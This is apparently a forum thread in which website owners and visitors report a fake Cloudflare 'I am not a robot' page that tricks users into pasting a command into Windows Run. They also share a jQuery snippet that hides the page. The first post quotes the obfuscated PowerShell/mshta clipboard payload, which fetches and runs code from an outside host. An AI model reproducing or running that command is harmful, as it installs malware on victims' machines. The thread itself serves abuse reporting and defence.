Fake Cloudflare bot verification page malware

What is the name of the domain?

https://albatrosship.com/

What is the issue you’re encountering

Phishing - Malware

What steps have you taken to resolve the issue?

Website presented a cloudflare verification page. But when clicked the page says “Unusual web traffic detected” and provides steps to resolve this manually. The steps are to open Windows Run by pressing Win + R buttons and pasting the test they provide.
The text looks like this in the website → “Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 6RM-42B”
But when copied by the copy button next to it this is what it contains → “POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\S2\\\\\\mht*e https://black.hologramm.us/ # ‘‘Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 6RM-42B’’”

Was the site working with SSL prior to adding it to Cloudflare?

Yes

What is the current SSL/TLS setting?

Off

Please report this to the Trust & Safety team using the abuse page here: https://abuse.cloudflare.com/

Good luck!

I’ve tried everything to remove this malware, or at least identify where it’s generated.

No server-side or local malware scanners have detected anything, and there doesn’t seem to be much information on the internet at this point.

For those who might find it useful, what I’ve done is create a small JavaScript that prevents this screen from popping up, so your users can access it normally.

Simply add this code to your website:

At the moment, you don’t have any sites using cloudflare, when did you first start to see the malware page?

The phishing script is injected via a Cloudflare Worker, at least in other sites that I have observed, so the attackers have somehow gotten access to your account.

Hi, do you mind posting the script? I cant find it.

My site didn’t have Cloudflare, and my hosting didn’t configure it for me either. The malware started about 10 days ago.

Sorry I didn’t paste the code. It’s simply to make the iframe it creates disappear, so users don’t see it and can browse. But it doesn’t delete it.

In my case, it’s a WordPress with WooCommerce, and it puts the code in the last div. I imagine it will also put it in your last div, whether it’s WordPress or not.

<script type="text/javascript">

jQuery(document).ready(function(){

jQuery("div:last").css("z-index", "0 !important");
jQuery("div:last").css("display", "none !important");

});
</script>

And just in case it gives any clues. In my case, if I was logged in to WordPress, then it didn’t appear.

And when I wasn’t logged in, it appeared randomly. For example, it didn’t appear with Linux or Ubuntu, but it did with Windows. Also, if I accessed it with a VPN or proxies, it appeared in some cases, but not in others. And as far as I could tell, I found no trace of it in my database or files, so I think it might be injecting a call to an external JavaScript.

For cloudflare team, my website affected is: https://certyfile.com

I’ve just found a nice article on how the fake captcha is loaded: EtherHiding and ClickFix: new mask of social engineering campaign

As for your site, maybe you could avoid getting infected by malware if you installed updates every once in a while:

x-powered-by: PHP/8.1.10
server: Apache/2.4.57

PHP 8.1.10 was released in September 2022, Apache 2.4.57 in April 2023.

It’s not my site. I’ve just come across the suspicious verification page while browsing